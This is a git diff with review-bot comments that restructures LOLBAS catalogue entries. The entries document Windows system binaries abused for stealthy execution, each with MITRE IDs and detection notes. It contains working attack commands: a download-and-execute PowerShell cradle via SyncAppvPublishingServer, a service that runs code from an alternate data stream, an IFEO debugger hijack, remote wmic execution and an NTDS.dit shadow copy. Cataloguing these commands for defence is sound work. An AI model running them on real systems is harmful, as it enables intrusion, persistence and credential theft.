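Review bot: The second `Full Path` entry reads `CC:\Windows\WinSxS\...`, a doubled drive letter that will never match a real path; it should be `- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe`. The detection `- IOC: Event 4014 - Powershell logging` looks like a transposition: script block logging is event 4104 in Microsoft-Windows-PowerShell/Operational, and `Event 400` (engine state Available) lives in the Windows PowerShell log, so naming the log next to each ID would make both IOCs actionable.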
@@ -1,19 +1,27 @@ --- -Name: SC.exe -Description: Execute, Read ADS, Create Service, Start Service -Author: '' +Name: Sc.exe +Description: Used by Windows to manage services +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: | - sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto - sc start evilservice - Description: '' + - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice + Description: Creates a new service and executes the file stored in the ADS. + Usecase: Execute binary file hidden inside an alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\sc.exe - - C:\Windows\SysWOW64\sc.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\sc.exe + - Path: C:\Windows\SysWOW64\sc.exe +Code Sample: +- Code: +Detection: + - IOC: Services that gets created Resources: - - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ -Notes: Thanks to Oddvar Moe - @oddvarmoe + - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index ea21da1..98f9a95 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml 
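Review bot: The joined command carries a stray backslash, `start= auto\ & sc start evilservice`, so the `\` becomes part of the `start=` argument and `sc create` will most likely reject it; drop it: `start= auto & sc start evilservice`. `Privileges: User` is also doubtful: creating a service needs SC_MANAGER_CREATE_SERVICE on the service control manager, which by default only administrators hold, so `Privileges: Administrator` would match the other admin-only entries in this commit (Runonce, Wab) and keep triage from under-rating the activity. Wording: `- IOC: Services that gets created` should read `Services that get created`.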
@@ -1,21 +1,37 @@ --- Name: Scriptrunner.exe -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Scriptrunner.exe -appvscript calc.exe - Description: Execute calc.exe. + Description: Executes calc.exe + Usecase: Execute binary through proxy binary to evade defensive counter measurments + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" - Description: Execute the calc.cmd script on the remote share. + Description: Executes calc.cmde from remote server + Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\scriptrunner.exe - - c:\windows\sysWOW64\scriptrunner.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\scriptrunner.exe + - Path: C:\Windows\SysWOW64\scriptrunner.exe +Code Sample: +- Code: +Detection: + - IOC: Scriptrunner.exe should not be in use unless App-v is deployed Resources: - - https://twitter.com/KyleHanslovan/status/914800377580503040 - - https://twitter.com/NickTyrer/status/914234924655312896 - - https://github.com/MoooKitty/Code-Execution -Notes: Thanks to Nick Tyrer - @NickTyrer + - Link: https://twitter.com/KyleHanslovan/status/914800377580503040 + - Link: https://twitter.com/NickTyrer/status/914234924655312896 + - Link: https://github.com/MoooKitty/Code-Execution +Acknowledgement: + - Person: Nick Tyrer + Handle: '@nicktyrer' +--- \ No newline at end of file 
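Review bot: The second command's new description has a typo, `Executes calc.cmde from remote server`, for `Executes calc.cmd from remote server`, and both `Usecase` lines spell `counter measurments`, which should be `countermeasures`. The `Handle` was lower-cased to `@nicktyrer` while the Resources link still uses `NickTyrer`; either form resolves, but one spelling across the file is tidier.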
diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index a284590..7450aef 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -1,16 +1,27 @@ --- Name: SyncAppvPublishingServer.exe -Description: Execute -Author: '' +Description: Used by App-v to get App-v server lists +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Description: Example command on how inject Powershell code into the process + Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\SyncAppvPublishingServer.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\SyncAppvPublishingServer.exe + - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe +Code Sample: +- Code: +Detection: + - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed Resources: - - https://twitter.com/monoxgas/status/895045566090010624 -Notes: Thanks to Nick Landers - @monoxgas + - Link: https://twitter.com/monoxgas/status/895045566090010624 +Acknowledgement: + - Person: Nick Landers + Handle: '@monoxgas' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index dba8f83..f53d2ae 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml 
@@ -1,20 +1,28 @@ ---- + --- Name: Wab.exe -Description: Execute -Author: '' +Description: Windows address book manager +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: Wab.exe - Description: Loads a DLL configured in the registry under HKLM. + - Command: wab.exe + Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice + Usecase: Execute dll file. Bypass defensive counter measures + Category: Execute + Privileges: Administrator + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Program Files\Windows Mail\wab.exe ' - - 'C:\Program Files (x86)\Windows Mail\wab.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Program Files\Windows Mail\wab.exe + - Path: C:\Program Files (x86)\Windows Mail\wab.exe +Code Sample: +- Code: +Detection: + - IOC: WAB.exe should normally never be used Resources: - - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ - - https://twitter.com/Hexacorn/status/991447379864932352 -Notes: | - Thanks to Adam - @Hexacorn - Requires registry changes, Requires Administrative Access + - Link: https://twitter.com/Hexacorn/status/991447379864932352 + - Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ +Acknowledgement: + - Person: Adam + Handle: '@Hexacorn' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index d49bfc1..50e2d3c 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml 
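Review bot: The first line of the file changes from `---` to ` ---` with a leading space, which is no longer a YAML document-start marker; an indented `---` followed by `Name: Wab.exe` at column 0 will either fail to parse or be read as a stray plain scalar, so restore `---` at column 0 (the whitespace is inferred from the `---- + ---` pair in the collapsed hunk — confirm in the raw file). The rest of the entry, including `Privileges: Administrator` for the registry-driven `DLLPath`, carries the old notes over correctly.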
@@ -1,46 +1,85 @@ --- -Name: WMIC.exe -Description: Reconnaissance, Execute, Read ADS -Author: '' +Name: Wmic.exe +Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: wmic.exe process call create calc - Description: Execute calc.exe. - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" Description: Execute a .EXE file stored as an Alternate Data Stream (ADS). - - Command: wmic.exe useraccount get /ALL - Description: List the user accounts on the machine. - - Command: wmic.exe process get caption,executablepath,commandline - Description: Gets the command line used to execute a running program. - - Command: wmic.exe qfe get description,installedOn /format:csv - Description: Gets a list of installed Windows updates. - - Command: wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%") - Description: Check to see if the target system is running SQL. - - Command: get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" - Description: Use the PowerShell cmdlet to list the shares on a remote server. 
- - Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: wmic.exe process call create calc + Description: Execute calc from wmic + Usecase: Execute binary from wmic to evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. + Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. 
+ Usecase: Execute binary on a remote system + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. + Usecase: Execute binary with scheduled task created with wmic on a remote computer + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" Description: Create a volume shadow copy of NTDS.dit that can be copied. - - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" - Description: Execute a script contained in the target .XSL file hosted on a remote server. - - Command: wmic.exe os get /format:"MYXSLFILE.xsl" - Description: Executes JScript or VBScript embedded in the target XSL stylesheet. + Usecase: Execute binary on remote system + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" + Description: Create a volume shadow copy of NTDS.dit that can be copied. 
+ Usecase: Execute binary on remote system + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. - + Usecase: Execute script from remote system + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\wbem\wmic.exe - - c:\windows\sysWOW64\wbem\wmic.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\wmic.exe + - Path: C:\Windows\SysWOW64\wmic.exe +Code Sample: +- Code: +Detection: + - IOC: Wmic getting scripts from remote system Resources: - - https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory - - https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html - - https://twitter.com/subTee/status/986234811944648707 -Notes: Thanks to Casey Smith - @subtee + - Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory + - Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html + - Link: https://twitter.com/subTee/status/986234811944648707 +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index 989c166..144d221 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml 
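Review bot: The new entry for `wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"` copies its metadata from the vssadmin entry above it — `Description: Create a volume shadow copy of NTDS.dit that can be copied.` and `Usecase: Execute binary on remote system` — whereas the removed line it replaces said `Execute a script contained in the target .XSL file hosted on a remote server.`; the description and usecase should describe XSL script execution, as the `\\127.0.0.1\c$\Tools\pocremote.xsl` entry below does. `Full Path` also loses the `wbem` directory that the removed lines had (`c:\windows\system32\wbem\wmic.exe`): wmic.exe lives under `System32\wbem\` and `SysWOW64\wbem\`, so `- Path: C:\Windows\System32\wbem\wmic.exe` and `- Path: C:\Windows\SysWOW64\wbem\wmic.exe` are the correct values, and a path-based detection written from the new value would miss the binary. Both points sit in the tail of this hunk, which starts three lines earlier with the file header.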
@@ -1,17 +1,27 @@ --- Name: Wscript.exe -Description: Execute, Read ADS -Author: '' +Description: Used by Windows to execute scripts +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: wscript c:\ads\file.txt:script.vbs - Description: Executes the .VBS script stored as an Alternate Data Stream (ADS). + Description: Execute script stored in an alternate data stream + Usecase: Execute hidden code to evade defensive counter measures + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\wscript.exe - - c:\windows\sysWOW64\wscript.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\wscript.exe + - Path: C:\Windows\SysWOW64\wscript.exe +Code Sample: +- Code: +Detection: + - IOC: Wscript.exe executing code from alternate data streams Resources: - - '?' -Notes: Thanks to ? + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index b5f5d0d..216e397 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml 
@@ -1,21 +1,29 @@ --- Name: Xwizard.exe -Description: DLL hijack, Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: xwizard.exe - Description: Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll. - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. + Usecase: Run a com object created in registry to evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\xwizard.exe - - c:\windows\sysWOW32\xwizard.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\xwizard.exe + - Path: C:\Windows\SysWOW64\xwizard.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ - - https://www.youtube.com/watch?v=LwDHX7DVHWU - - https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 -Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer + - Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ + - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU + - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 +Acknowledgement: + - Person: Adam + Handle: '@Hexacorn' +--- \ No newline at end of file
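Review bot: `Acknowledgement` now credits only Adam (`@Hexacorn`) although the removed `Notes` also thanked `Nick Tyrer - @nicktyrer` and his gist is still listed under Resources; add a second entry, `- Person: Nick Tyrer` / `Handle: '@nicktyrer'`, as Rpcping.yml does for two contributors. The `Full Path` fix from `sysWOW32` to `SysWOW64` is correct and worth keeping.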